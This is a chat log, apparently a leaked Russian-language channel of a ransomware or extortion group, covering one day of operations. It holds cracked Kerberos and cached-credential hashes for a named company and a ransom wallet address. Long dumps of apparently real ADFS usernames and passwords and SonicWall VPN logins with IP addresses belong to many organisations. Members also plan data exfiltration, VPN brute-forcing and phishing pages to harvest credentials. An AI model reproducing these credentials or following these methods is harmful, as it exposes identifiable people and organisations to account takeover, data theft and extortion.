[2024-05-21 02:07:14] @usernamehunter:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*primeadmin$sescolighting.com$MSSQLSvc/PRIMESQL.sescolighting.com:1433@sescolighting.com*$2c011e93982.......0104fbe84c4:222$esco

--------------------
[2024-05-21 04:54:20] @usernameyy:matrix.bestflowers247.online: Ага, дважды, один раз в сводке, один раз по новой уязвимости. Биток по 71к опять, круто
--------------------
[2024-05-21 05:44:00] @usernameyy:matrix.bestflowers247.online: ```
bc1qruylkqzt2vp2adrd0pqj25rjeds6vtvxhrd5hgl4kqx4uzleuk2sta804m
--------------------
[2024-05-21 05:44:06] @usernameyy:matrix.bestflowers247.online: кошелек для вчерашнего
--------------------
[2024-05-21 06:27:01] @usernameyy:matrix.bestflowers247.online: напомню, что жду дабл и сингл, мне надо в кобу зайти  для тестов софта
--------------------
[2024-05-21 07:01:45] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 07:10:47] @usernamecc:matrix.bestflowers247.online: +++
--------------------
[2024-05-21 07:12:05] @usernamett:matrix.bestflowers247.online: ```
admin.mt:1bb50579c98d711514a20f3f213f1ae7
Administrator:d505ff1db6a8f5f64e9c4e4aa60bea54
admin.mt:08b680004adfe83d3444bc0f2586d6c1
admin.ab:fe91e1ffd92afc378986043df44ec82e
```
--------------------
[2024-05-21 07:14:26] @usernameboy:matrix.bestflowers247.online: > <@usernamett:matrix.bestflowers247.online> ```
> admin.mt:1bb50579c98d711514a20f3f213f1ae7
> Administrator:d505ff1db6a8f5f64e9c4e4aa60bea54
> admin.mt:08b680004adfe83d3444bc0f2586d6c1
> admin.ab:fe91e1ffd92afc378986043df44ec82e
> ```

DCC2 ?
--------------------
[2024-05-21 07:14:32] @usernamett:matrix.bestflowers247.online: da
--------------------
[2024-05-21 07:18:27] @usernameboy:matrix.bestflowers247.online: > <@usernamett:matrix.bestflowers247.online> ```
> admin.mt:1bb50579c98d711514a20f3f213f1ae7
> Administrator:d505ff1db6a8f5f64e9c4e4aa60bea54
> admin.mt:08b680004adfe83d3444bc0f2586d6c1
> admin.ab:fe91e1ffd92afc378986043df44ec82e
> ```

DCC1!!!!!!!  d505ff1db6a8f5f64e9c4e4aa60bea54:administrator:asterix

--------------------
[2024-05-21 07:18:32] @usernamett:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 07:25:24] @usernamett:matrix.bestflowers247.online: > <@usernamett:matrix.bestflowers247.online> ```
> DCC2
>
> admin.ab:3458be85a72f7c0734da0982c06e45b8
> admin.mt02:7ef283da4fa9f77f021b1b4d787f161e
> admin.ug:ecbf8d0d07bb4f65d601c0c7996f78ff
> admin.ma:cbbcba954588b972787b1cfacc06a190
> admin.pc:6a640ab172c344e7c6fb9f6c98a17e1b
> ```

эти тоже тогда DCC1
--------------------
[2024-05-21 07:40:22] @usernamecc:matrix.bestflowers247.online: akdenizchemson.com - походу я ее пропустил, либо у них еще вчера было чуть времени. тоже таймер, надо подсветить.
--------------------
[2024-05-21 07:59:21] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> кошелек для вчерашнего

скоро отправлю
--------------------
[2024-05-21 08:04:30] @usernamegg:matrix.bestflowers247.online: я думаю по счет выкачки данных
--------------------
[2024-05-21 08:04:37] @usernamegg:matrix.bestflowers247.online: СС сильно не вывозит
--------------------
[2024-05-21 08:04:46] @usernamegg:matrix.bestflowers247.online: много где стоит все что можно и нельзя
--------------------
[2024-05-21 08:04:57] @usernamegg:matrix.bestflowers247.online: нам нужно пересмотреть отдел выкачки файлов
--------------------
[2024-05-21 08:05:12] @usernamegg:matrix.bestflowers247.online: ты его должен возглавить
--------------------
[2024-05-21 08:05:25] @usernameyy:matrix.bestflowers247.online: ну тогда я буду автоматизировать это дело
--------------------
[2024-05-21 08:05:29] @usernamegg:matrix.bestflowers247.online: и прям все силы бросить на постоянную выкачку файлов с сеток
--------------------
[2024-05-21 08:05:35] @usernamegg:matrix.bestflowers247.online: скоро качать вообще нам не дадут ничего
--------------------
[2024-05-21 08:05:41] @usernamegg:matrix.bestflowers247.online: все больше и больше проблем с этим
--------------------
[2024-05-21 08:06:00] @usernamegg:matrix.bestflowers247.online: ну тебе нужно прямо сейчас плотно начать помогать СС
--------------------
[2024-05-21 08:06:08] @usernameyy:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-21 08:06:14] @usernamegg:matrix.bestflowers247.online: он технически несилен и у него постоянно какой то СТОП
--------------------
[2024-05-21 08:06:25] @usernamegg:matrix.bestflowers247.online: из-за незнаний , страха и тд
--------------------
[2024-05-21 08:06:37] @usernamegg:matrix.bestflowers247.online: там стоит какая то хуйня которая не дает качать
--------------------
[2024-05-21 08:07:00] @usernamegg:matrix.bestflowers247.online: любые сервера,прокладки,домены и все что необходимо быстро сделаю CC + TT
--------------------
[2024-05-21 08:07:13] @usernameyy:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> там стоит какая то хуйня которая не дает качать

это прямо сейчас происходит?
--------------------
[2024-05-21 08:07:14] @usernamegg:matrix.bestflowers247.online: но над ними должен стоять только YY
--------------------
[2024-05-21 08:07:18] @usernamegg:matrix.bestflowers247.online: мы раскрутили
--------------------
[2024-05-21 08:07:32] @usernamegg:matrix.bestflowers247.online: не не вообще не так
--------------------
[2024-05-21 08:07:38] @usernamegg:matrix.bestflowers247.online: мы заразили
--------------------
[2024-05-21 08:07:40] @usernamegg:matrix.bestflowers247.online: нашли таргет
--------------------
[2024-05-21 08:07:51] @usernamegg:matrix.bestflowers247.online: либо сбрутили каким то волшебным образом впн
--------------------
[2024-05-21 08:07:55] @usernamegg:matrix.bestflowers247.online: подключились
--------------------
[2024-05-21 08:08:07] @usernamegg:matrix.bestflowers247.online: каким то волшебным образом раскрутили
--------------------
[2024-05-21 08:08:08] @usernamegg:matrix.bestflowers247.online: сетку
--------------------
[2024-05-21 08:08:10] @usernamegg:matrix.bestflowers247.online: есть креды
--------------------
[2024-05-21 08:08:20] @usernamegg:matrix.bestflowers247.online: даже дату СС нашел где лежит
--------------------
[2024-05-21 08:08:40] @usernamegg:matrix.bestflowers247.online: но там на всех тачках от рансома стоит какая то херня которая не дает качать
--------------------
[2024-05-21 08:08:47] @usernamegg:matrix.bestflowers247.online: он нихуя сделать не может
--------------------
[2024-05-21 08:08:57] @usernamegg:matrix.bestflowers247.online: рклон
--------------------
[2024-05-21 08:08:57] @usernamegg:matrix.bestflowers247.online: мега
--------------------
[2024-05-21 08:09:03] @usernamegg:matrix.bestflowers247.online: приложухи разхные
--------------------
[2024-05-21 08:09:07] @usernameyy:matrix.bestflowers247.online: че может я приеду чтобы не писать это?
--------------------
[2024-05-21 08:09:07] @usernamegg:matrix.bestflowers247.online: нужно новое решение
--------------------
[2024-05-21 08:09:47] @usernameyy:matrix.bestflowers247.online: ну некоторые защиты и я обойти не смогу, конечно, но лучше сделаю
--------------------
[2024-05-21 08:11:08] @usernameyy:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> че может я приеду чтобы не писать это?

я сегодня не хотел, тк у нас воду отключили))
--------------------
[2024-05-21 08:11:12] @usernameyy:matrix.bestflowers247.online: немытый сижу
--------------------
[2024-05-21 08:11:47] @lapa:matrix.bestflowers247.online: Доброе утро!
--------------------
[2024-05-21 08:13:01] @usernamegg:matrix.bestflowers247.online: ты приедешь ?
--------------------
[2024-05-21 08:13:08] @usernamegg:matrix.bestflowers247.online: ты так то нужен сегодня тут
--------------------
[2024-05-21 08:13:25] @usernamegg:matrix.bestflowers247.online: ну можешь прихать
--------------------
[2024-05-21 08:14:08] @usernamegg:matrix.bestflowers247.online: гостевую комнату которую ты окупировал там приехал у меня брат.
--------------------
[2024-05-21 08:14:15] @usernamegg:matrix.bestflowers247.online: о
--------------------
[2024-05-21 08:14:17] @usernamegg:matrix.bestflowers247.online: доброе утро
--------------------
[2024-05-21 08:16:14] @lapa:matrix.bestflowers247.online: CISCO_VALID_ITEMS.txt
--------------------
[2024-05-21 08:16:16] @lapa:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-21 08:16:17] @lapa:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-21 08:16:17] @lapa:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-21 08:16:18] @lapa:matrix.bestflowers247.online: AUTH_VALID.txt
--------------------
[2024-05-21 08:16:54] @usernamegg:matrix.bestflowers247.online: CISCO_VALID_ITEMS.txt
--------------------
[2024-05-21 08:17:03] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-21 08:17:09] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-21 08:17:14] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-21 08:17:19] @usernamegg:matrix.bestflowers247.online: AUTH_VALID.txt
--------------------
[2024-05-21 08:17:55] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 08:18:24] @usernameyy:matrix.bestflowers247.online: ага оккупирова)
--------------------
[2024-05-21 08:18:27] @usernameyy:matrix.bestflowers247.online: * ага оккупировал)
--------------------
[2024-05-21 08:18:32] @usernameyy:matrix.bestflowers247.online: принял душ прохладный
--------------------
[2024-05-21 08:18:42] @usernameyy:matrix.bestflowers247.online: щас 30 мин соберусь выезжаю
--------------------
[2024-05-21 08:57:37] @lapa:matrix.bestflowers247.online: а под андройд что-то шлют ?
--------------------
[2024-05-21 09:11:44] @usernamett:matrix.bestflowers247.online: kekhash.txt
--------------------
[2024-05-21 09:37:03] @usernamegg:matrix.bestflowers247.online: смс )
--------------------
[2024-05-21 09:41:23] @lapa:matrix.bestflowers247.online: не, я про то, чем заражают андроид
--------------------
[2024-05-21 09:47:23] @usernamegg:matrix.bestflowers247.online: Hi guys the synlab leak is fireee, thanks for sharing it. can you upload a file tree with folder paths? so i can download only the files i am interested cause the leak is huge and synlab workers keeps the files like shit. thanks boys, keep it cool
--------------------
[2024-05-21 09:47:26] @usernamegg:matrix.bestflowers247.online: Hi guys the synlab leak is fireee, thanks for sharing it. can you upload a file tree with folder paths? so i can download only the files i am interested cause the leak is huge and synlab workers keeps the files like shit. thanks boys, keep it cool
--------------------
[2024-05-21 09:52:50] @usernamegg:matrix.bestflowers247.online: вот самому интересно
--------------------
[2024-05-21 09:52:54] @usernamegg:matrix.bestflowers247.online: что там шлют
--------------------
[2024-05-21 10:13:00] @usernameww:matrix.bestflowers247.online: ```
168b2b29a63cee298d66939951961dcd
088c9d2ace99d10ba069cd01c8ab6cbb
19dd75e2fa54b9078912602251b6ff60
70b1083be430e5a4899d74b094db53e3
```
--------------------
[2024-05-21 10:25:38] @usernameboy:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> ```
> 168b2b29a63cee298d66939951961dcd
> 088c9d2ace99d10ba069cd01c8ab6cbb
> 19dd75e2fa54b9078912602251b6ff60
> 70b1083be430e5a4899d74b094db53e3
> ```

19dd75e2fa54b9078912602251b6ff60:$esco6100$

--------------------
[2024-05-21 10:25:43] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 10:34:50] @usernamegg:matrix.bestflowers247.online: от adfs можно брать еще пароли для брута
--------------------
[2024-05-21 10:35:09] @usernamegg:matrix.bestflowers247.online: ```
https://sts.centura.org/adfs/ls/:centura\singram4:Jimfp2012!!A
https://sts.centura.org/adfs/ls/:centura\singram4:Eimfnoat2020!!!A
https://sts.lutron.com/adfs/ls/:jquintero@lutron.com:Lutron$18
https://login.festo.com/adfs/ls/:armando1976@hotmail.it:Cino2207
https://login.festo.com/adfs/ls/:Tatsiana.Shauchenka@rnd.armacoind.com:Tfsaz2010Tfsaz2010
https://addsts.statestreet.com/adfs/ls/:mfabis@statestreet.com:GiOvq!Pp0479!
https://sso.hust.edu.vn/adfs/ls/:Thanh.nn202129M@sis.hust.edu.vn:Nhuthanh96
https://sts.comunidadunir.net/adfs/ls/:alazne.sabria109@comunidadunir.net:azn320AGSabr_
https://sso.hust.edu.vn/adfs/ls/:Thanh.NN202129M@sis.hust.edu.vn:Nhuthanh96
https://asso.hust.edu.vn/adfs/ls/:Thanh.NN202129M@sis.hust.edu.vn:Nhuthanh96
https://sso.hust.edu.vn/adfs/ls/:thanh.nn202129m@sis.hust.edu.vn:Nhuthanh96
https://sso.unibge.hu/adfs/ls/:martin.oras.40@unibge.hu:Siskebab2
https://sso.unibge.hu/adfs/ls/:Martin.Oras.40@unibge.hu:Siskebab2
https://federatedservices.conestogac.on.ca/adfs/ls/:Avelmurugan1815@conestogac.on.ca:AreYouReady@wwehhh
https://adfs.emag.ro/adfs/portal/updatepassword/:ionut tudorache@emag.ro:Matei@Luca2019
https://adfs.emag.ro/adfs/portal/updatepassword/:ionut.tudorache@emag:Septembrie2014@
https://adfs.emag.ro/adfs/ls/:ionut.tudorache@emag.ro:Bucuresti2025@
https://adfs.ethosenergygroup.pl/adfs/oauth2/authorize:zbigniew.bulik@ethosenergygroup.pl:Lubliniec2023!
https://adconnect.mic.ul.ie/adfs/portal/updatepassword:22603893@micstudent.mic.ul.ie:$Linc2022
https://adfs.amissima.it/adfs/ls:ag030401@xnet.priv:ALICE020$$
https://sts.fiatgroup.com/adfs/ls/:FGEXTRANET\W16253E:Eihhq5h73!
https://login.telecom.pt/adfs/ls/:vieira_marco@hotmail.com:MGVieira_84
https://login.telecom.pt/adfs/ls/:xXkalamaiaXx@gmail.com:MGVieira84*
https://login.telecom.pt/adfs/ls/:jorge.s.sousa@hotmail.com:headkill84
https://login.telecom.pt/adfs/ls/:jorge.s.sousa@live.com:Headkill84
https://gas.mcd.com/adfs/ls/:eg271150:Ghema.98
https://login.fcabank.it/adfs/ls/IdpInitiatedSignOn.aspx:1528109:AccountFCA@CafCar123
https://sts.leroymerlin.pl/adfs/ls/:gbonikowski@leroymerlin.pl:Grzesio01
https://idp.rockwellautomation.com/adfs/oauth2/authorize:plennon@designproautomation.com:DesignPro1
https://sso2.fanuc.eu/adfs/ls/:office@kimex-bg.com:Fanuc2023
https://sso2.fanuc.eu/adfs/ls/:lyudmil.boykov@gmail.com:MyPass2024
https://adfs.unimagdalena.edu.co/adfs/ls/:jpsilvam@unimagdalena.edu.co:Js20043001
https://ad-wfs.ucsd.edu/adfs/ls/:m1sun@ucsd.edu:Smjdiao201312
https://sts.northumbria.ac.uk/adfs/ls/:unn\W21033446:Zsm302406.
https://auth.miami.edu/adfs/ls/:cgcent\fxs326:Mark970908*
https://adfs.mdc.edu/adfs/ls/:mymdc\ziqing.peng001:Pushupvictoria0730
https://sts.northumbria.ac.uk/adfs/ls/:unn\w22032748:Ld19850109
https://auth.miami.edu/adfs/ls/:zxd172@miami.edu:Peterdzx3726#
https://auth.miami.edu/adfs/ls/:cgcent\jxz760:Zj=19980228
https://auth.miami.edu/adfs/ls/:cgcent\bxz263:Let.it.be22
https://sts.northumbria.ac.uk/adfs/ls/:unn\w21045477:9#gkpH#yp
https://auth.miami.edu/adfs/ls/:yxl1709@miami.edu:Ly20010826.
https://adfs.herts.ac.uk/adfs/ls/IdpInitiatedSignOn.aspx:px20aaa@herts.ac.uk:SZHDSG990211.
https://sts.northumbria.ac.uk/adfs/ls/:unn\w21040946:ABCdef1245990742
https://sts.northumbria.ac.uk/adfs/ls/:unn\w22073848:Application123@
https://sso.dynatacorp.com/adfs/ls/idpinitiatedSignon.aspx:29140@dynatacorp.com:WelcometoSSI0922
https://adfscl.cencosud.com/adfs/ls/:cencosud\htoledov:A13jandro1967
https://auth.laureate.net/adfs/ls/:N00233163@upn.pe:Dentista123*
https://auth.laureate.net/adfs/ls/:n00233163@upn.pe:Guille4403705006
https://auth.laureate.net/adfs/ls/:n00233163@upn.pe:Carnaval4403705006
https://sso.unite.un.org/adfs/ls/:minusca-fpp-orb2@un.org:ORBITER2Bbangui
https://hqssoil.ness.com/adfs/ls/:P0026840:ad!r4678
https://auth.bncr.fi.cr/adfs/ls:304910728:Zxcv0914
https://fs.bcnet.bcb.gov.br/adfs/oauth2/authorize:6394388335:Tcel47
https://adfs.cpf.co.th/adfs/ls/:sasimaporn.wat@cpf.co.th:Sasi*102022
https://sts.workd.go.th/adfs/ls:atc211_66@rta.mi.th:Jt*612450
https://fs.worcester.edu/adfs/ls/:cndungu1@worcester.edu:Chrismungai10064
https://adfs.enipponpaint.com/adfs/ls/:npm\ed206:Bmg5089!!!
https://sts.utpl.edu.ec/adfs/ls/:anapolo1@utpl.edu.ec:Angie10Apolo
https://sts.utpl.edu.ec/adfs/ls/:cgtorres5@utpl.edu.ec:cgtl20001
https://fs.adfs.stir.ac.uk/adfs/ls/:lee00014@students.stir.ac.uk:Heartbeat123
https://adfsstaff.mans.edu.eg/adfs/ls/:magdyrezkallah@std.mans.edu.eg:Asdf2030@
https://adfs.mans.edu.eg/adfs/ls/IdpInitiatedSignOn.aspx:magdyrezkallah@std.mans.edu.eg:Asdf2030@
https://sts.workd.go.th/adfs/ls:a3701@dld.go.th:Livestock3701@
https://sts.workd.go.th/adfs/ls/:pvlo_ano@dld.go.th:AmnatcharoenPVC@37000ANC
https://sts.workd.go.th/adfs/ls/:a3701@dld.go.th:Livestock3701@
https://login.kaplan-student.edu.au/adfs/oauth2/authorize/:kaplan-student.edu.au\1816683:Expert@Kaplan321
https://adfs.franquiacacaushow.com.br/adfs/ls/:marilia.oliveira@franquiacacaushow.com.br:Mo65024613368
https://sts.espol.edu.ec/adfs/ls/:jorgrome@espol.edu.ec:Angelgg12
https://adfs.inacap.cl/adfs/ls/:inacap\21670623-4:Sk8sbplug$
```
--------------------
[2024-05-21 10:37:35] @usernamegg:matrix.bestflowers247.online: как то на валид такое отчекать
--------------------
[2024-05-21 10:37:39] @usernamegg:matrix.bestflowers247.online: а то я ручками умру
--------------------
[2024-05-21 10:37:40] @usernamegg:matrix.bestflowers247.online: 1065551783.adfs_cleaned.txt
--------------------
[2024-05-21 10:48:19] @username777:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> ```
> 168b2b29a63cee298d66939951961dcd
> 088c9d2ace99d10ba069cd01c8ab6cbb
> 19dd75e2fa54b9078912602251b6ff60
> 70b1083be430e5a4899d74b094db53e3
> ```

088c9d2ace99d10ba069cd01c8ab6cbb:$3$c032751!
168b2b29a63cee298d66939951961dcd:$3sc0456!
70b1083be430e5a4899d74b094db53e3:$esco32751!


--------------------
[2024-05-21 10:48:24] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 10:51:25] @username777:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*Administrator$sescolighting.com$SCVMM/SC-VMM.sescolighting.com@sescolighting.com*$759ab22ee626cab6caa...847296261d:$3sc0456!
$krb5tgs$23$*adfs$sescolighting.com$host/adfs.sescolighting.com@sescolighting.com*$ef8f3f6b21eab8dd1a8...58acbc9b83:$esco32751!


--------------------
[2024-05-21 10:51:42] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 10:56:25] @usernamegg:matrix.bestflowers247.online: пролил вчера трафик ?
--------------------
[2024-05-21 11:03:19] @lapa:matrix.bestflowers247.online: скоро посмотрю, получится ли сделать чекер
--------------------
[2024-05-21 11:10:13] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 11:10:23] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 14.09.48.png
--------------------
[2024-05-21 11:10:32] @usernamegg:matrix.bestflowers247.online: у соника прям много 2fa
--------------------
[2024-05-21 11:11:49] @lapa:matrix.bestflowers247.online: ясно
--------------------
[2024-05-21 11:12:56] @usernamegg:matrix.bestflowers247.online: https://63.233.208.26:4433   tammy   cherry   infotech-inc.com    2FA
https://100.38.81.37:443   jodio   jodio   smc    2FA
hgcconstruction.com   https://74.83.153.170:4433   hgc   jsuer   Peggysue1 2FA
https://98.175.228.102:4433   test   abc123   hagen_domain	2FA
https://50.214.238.73:4433   jason   jason00   itwfoilmark.ad	2FA
https://209.155.61.202:443   spam   spam   rwklawfirm.local    2FA
https://207.28.223.7:443   jobs   password   NWICC    2FA
https://100.2.200.22:443   vm   vm2014   wm	2FA
https://108.5.229.2:4433   orders   !QAZ2wsx   unipro	2FA
https://69.85.251.130:4433   honeyface07   Saturday1961   USSA.local    2FA DUO
https://50.241.178.161:4433   monica   Welcome2024!   AAY    2FA
https://108.179.5.100:443   sarah   March2024!   Coastal    2FA
lakebeverage.com 2FA
caseparts.com	https://64.79.133.40:443	caseparts.com	richardc	fighton     2FA
https://159.63.143.19:4433	jack.marshall	Password1	BDGARCHITECTS  2FA
lawmbg	https://50.222.183.10:4433	lawmbg	bblustein@lawmbg.com	Marshmallow1  2FA
https://12.149.252.114:4433	patrick.brisson	brisson	UTM  2FA

--------------------
[2024-05-21 11:13:05] @usernamegg:matrix.bestflowers247.online: ну я могу продолжать
--------------------
[2024-05-21 11:13:14] @usernamegg:matrix.bestflowers247.online: я думаю что под него фейк сделать
--------------------
[2024-05-21 11:13:33] @usernamegg:matrix.bestflowers247.online: но надо как то именно по компаниям слать в которых стоит именно соник этот фейк для входа
--------------------
[2024-05-21 11:13:36] @usernamegg:matrix.bestflowers247.online: что бы креды собрать
--------------------
[2024-05-21 11:13:42] @lapa:matrix.bestflowers247.online: можно
--------------------
[2024-05-21 11:13:57] @lapa:matrix.bestflowers247.online: только вот походу нет смысла, потому что они авторизуются через приложение, а не веб
--------------------
[2024-05-21 11:14:18] @lapa:matrix.bestflowers247.online: и опять же 2аф еще нужно как-то ловить
--------------------
[2024-05-21 11:14:30] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 14.14.12.png
--------------------
[2024-05-21 11:14:36] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> но надо как то именно по компаниям слать в которых стоит именно соник этот фейк для входа

это не проблема, могу чисто по ним слать
--------------------
[2024-05-21 11:14:37] @usernamegg:matrix.bestflowers247.online: можно попробовать
--------------------
[2024-05-21 11:14:43] @usernamegg:matrix.bestflowers247.online: форма входа стандартна]
--------------------
[2024-05-21 11:14:58] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> форма входа стандартна]

нет, так у них два типа вроде разных форм
--------------------
[2024-05-21 11:15:11] @lapa:matrix.bestflowers247.online: но боюсь нет смысла, им такая форма тупо не известна
--------------------
[2024-05-21 11:15:22] @lapa:matrix.bestflowers247.online: как с форти думаю будет и ситриксом
--------------------
[2024-05-21 11:15:36] @lapa:matrix.bestflowers247.online: потому что им админы ставят приложения на комп
--------------------
[2024-05-21 11:16:02] @lapa:matrix.bestflowers247.online: может лучше пока adfs пособирать ?
--------------------
[2024-05-21 11:16:10] @lapa:matrix.bestflowers247.online: он молчит ?
--------------------
[2024-05-21 11:16:11] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 14.15.37.png
--------------------
[2024-05-21 11:16:17] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-05-21 в 14.15.56.png
--------------------
[2024-05-21 11:16:29] @usernamegg:matrix.bestflowers247.online: вот хожу чекаю
--------------------
[2024-05-21 11:16:31] @usernamegg:matrix.bestflowers247.online: смотрю
--------------------
[2024-05-21 11:17:20] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> может лучше пока adfs пособирать ?

я тебе скинул , давай отчекаем
--------------------
[2024-05-21 11:17:30] @usernamegg:matrix.bestflowers247.online: зайдем , посмотрим
--------------------
[2024-05-21 11:17:32] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> я тебе скинул , давай отчекаем

да, разбьираюсь
--------------------
[2024-05-21 11:17:53] @lapa:matrix.bestflowers247.online: есть хоть один валидный adfs ?
--------------------
[2024-05-21 11:18:45] @lapa:matrix.bestflowers247.online: и который не через login.microsoftonline.com авторизуется
--------------------
[2024-05-21 11:18:58] @usernamegg:matrix.bestflowers247.online: нету у меня
--------------------
[2024-05-21 11:19:03] @usernamegg:matrix.bestflowers247.online: только тот что мы сделали
--------------------
[2024-05-21 11:19:06] @usernamegg:matrix.bestflowers247.online: сами
--------------------
[2024-05-21 11:19:07] @cameron777:matrix.org: privet
--------------------
[2024-05-21 11:19:09] @lapa:matrix.bestflowers247.online: ясно
--------------------
[2024-05-21 11:19:12] @cameron777:matrix.org: net esho zhdu vidachi buildov
--------------------
[2024-05-21 11:19:14] @lapa:matrix.bestflowers247.online: ладно, попробую найти
--------------------
[2024-05-21 11:19:53] @lapa:matrix.bestflowers247.online: https://sts.paaet.edu.kw/adfs/ls/ я смотрю у многих "An error occurred"
--------------------
[2024-05-21 11:23:32] @usernamegg:matrix.bestflowers247.online: даа
--------------------
[2024-05-21 11:23:44] @usernamegg:matrix.bestflowers247.online: я тоже перебрал норм
--------------------
[2024-05-21 11:35:29] @usernamegg:matrix.bestflowers247.online: 35154_NL_tcp.ovpn
--------------------
[2024-05-21 11:35:31] @usernamegg:matrix.bestflowers247.online: сингл
--------------------
[2024-05-21 11:35:40] @usernamegg:matrix.bestflowers247.online: попробуй его натяни на дабл
--------------------
[2024-05-21 11:35:49] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 11:40:01] @usernamett:matrix.bestflowers247.online: VPN_13_05_2024.zip
--------------------
[2024-05-21 11:41:33] @usernamegg:matrix.bestflowers247.online: Мобильные соксы лучше всего работают
--------------------
[2024-05-21 11:42:05] @lapa:matrix.bestflowers247.online: лучше для чего?
--------------------
[2024-05-21 11:43:05] @usernamegg:matrix.bestflowers247.online: чека
--------------------
[2024-05-21 11:43:06] @usernamegg:matrix.bestflowers247.online: спама
--------------------
[2024-05-21 11:43:11] @usernamegg:matrix.bestflowers247.online: ща подойду
--------------------
[2024-05-21 11:43:21] @usernamegg:matrix.bestflowers247.online: нашел тут чела
--------------------
[2024-05-21 11:43:34] @usernamegg:matrix.bestflowers247.online: 
Вывожу фишинг на новый уровень. Лайв панели/токенки/Evilginx/Modlishka/фейки — преимущества от всего и минимум от недостатков.

--------------------
[2024-05-21 11:43:47] @usernamegg:matrix.bestflowers247.online: пообщаюсь с ним по счет соника
--------------------
[2024-05-21 11:43:57] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-21 11:44:19] @lapa:matrix.bestflowers247.online: просто тут еще у каждой компании свой айпишник соника
--------------------
[2024-05-21 11:44:22] @lapa:matrix.bestflowers247.online: еще и несколько бывает
--------------------
[2024-05-21 11:44:39] @lapa:matrix.bestflowers247.online: но это в линке могу передавать, куда ему конектится к какому сонику
--------------------
[2024-05-21 11:51:40] @usernameyy:matrix.bestflowers247.online: пошло
--------------------
[2024-05-21 12:06:05] @lapa:matrix.bestflowers247.online: https://adfs.andersencorp.com/adfs/ls/idpinitiatedsignon.aspx:fureyjuliana@awtools.com:JosephT22!
--------------------
[2024-05-21 12:06:08] @lapa:matrix.bestflowers247.online: нашел один валидный
--------------------
[2024-05-21 12:06:21] @lapa:matrix.bestflowers247.online: делаю пока еще чекер
--------------------
[2024-05-21 12:06:27] @lapa:matrix.bestflowers247.online: за сегодня закончу думаю
--------------------
[2024-05-21 12:16:09] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-21 12:16:19] @lapa:matrix.bestflowers247.online: тут просто после авторизации еще просит выбрать куда войти
--------------------
[2024-05-21 12:16:31] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-21 12:16:34] @lapa:matrix.bestflowers247.online: а список не маленький
--------------------
[2024-05-21 12:28:35] @lapa:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 12:28:37] @lapa:matrix.bestflowers247.online: валид
--------------------
[2024-05-21 12:28:41] @lapa:matrix.bestflowers247.online: еще будет
--------------------
[2024-05-21 12:28:48] @lapa:matrix.bestflowers247.online: вы проверьте, что вы там с этим дальше будите делать
--------------------
[2024-05-21 12:28:59] @lapa:matrix.bestflowers247.online: потому что смотрю после авторизации просит выброать группу
--------------------
[2024-05-21 12:35:54] @lapa:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 12:35:59] @lapa:matrix.bestflowers247.online: много валида, но там 2аф походу
--------------------
[2024-05-21 12:38:58] @lapa:matrix.bestflowers247.online: как я понимаю, туда ходишь и дальше идет 2аф этап
--------------------
[2024-05-21 12:39:06] @lapa:matrix.bestflowers247.online: через разные сторонние сервисы
--------------------
[2024-05-21 12:39:15] @usernamegg:matrix.bestflowers247.online: я тут
--------------------
[2024-05-21 12:39:16] @usernamegg:matrix.bestflowers247.online: кушал
--------------------
[2024-05-21 12:40:31] @usernamegg:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 12:40:43] @usernamegg:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 12:41:08] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> много валида, но там 2аф походу

сейчас посмотрю
--------------------
[2024-05-21 12:41:17] @usernamegg:matrix.bestflowers247.online: там все отчекалось ?
--------------------
[2024-05-21 12:41:24] @lapa:matrix.bestflowers247.online: нет, не все
--------------------
[2024-05-21 12:41:25] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 12:41:26] @lapa:matrix.bestflowers247.online: я даже пока стопнул
--------------------
[2024-05-21 12:41:32] @lapa:matrix.bestflowers247.online: потому что там уже 2500 валида
--------------------
[2024-05-21 12:45:57] @usernamegg:matrix.bestflowers247.online: есть большая вероятность что эти креды от adfs
--------------------
